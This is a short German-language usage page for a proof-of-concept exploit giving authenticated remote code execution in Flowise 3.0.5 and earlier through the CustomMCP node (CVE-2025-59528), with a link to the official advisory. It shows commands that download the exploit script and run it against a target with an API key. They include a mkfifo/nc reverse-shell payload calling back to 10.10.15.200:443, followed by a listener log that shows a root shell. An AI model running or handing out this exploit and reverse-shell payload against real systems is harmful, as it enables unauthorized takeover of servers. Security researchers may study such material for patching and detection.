
Authentifiziertes RCE PoC für Flowise Version <= 3.0.5 über CustomMCP Node (CVE-2025-59528)
Authentifizierter RCE Proof-of-Concept für Flowise Version <= 3.0.5 über CustomMCP-Node (CVE-2025-59528)
Link zur offiziellen GHSA: https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
Beispielverwendung für eine Reverse Shell:
curl -sSLO 'https://raw.githubusercontent.com/corey-farley/CVE-2025-59528-Flowise-RCE/main/CVE-2025-59528.py'
chmod +x CVE-2025-59528.py
./CVE-2025-59528.py -t 'http://target.com' -k 'API_KEY' -cmd 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.200 443 >/tmp/f'
Überprüfen Sie den Listener, und es sollte funktionieren:
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.15.200] from (UNKNOWN) [10.129.64.221] 43393
sh: can't access tty; job control turned off
/ # whoami
root